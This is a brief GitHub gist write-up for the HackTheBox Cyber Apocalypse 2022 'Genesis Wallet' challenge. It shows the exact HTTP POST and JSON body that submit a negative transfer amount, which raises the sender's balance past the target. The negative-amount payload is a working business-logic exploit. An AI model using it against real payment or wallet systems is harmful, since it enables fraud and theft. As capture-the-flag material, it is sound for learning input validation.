Created
May 19, 2022 13:27
-
-
Save pich4ya/0db024271327c6abc3a96b986d2c781a to your computer and use it in GitHub Desktop.
HackTheBox Cyber Apocalypse 2022 Intergalactic Chase - Genesis Wallet Writeup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# author Pichaya Morimoto ([email protected]) | |
Unintened solution. | |
You create 2 users. Then, do transfer -9999 amount from one account to another. | |
POST /api/transactions/create HTTP/1.1 | |
[...] | |
Content-Length: 84 | |
{"amount": "-9999", "note": "asd", "receiver": "c8b07fa9e1a8f821bef8678c30641774"} | |
0.1 - (-9999) = 9999.1 | |
Then, you have more money than 1337 ! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment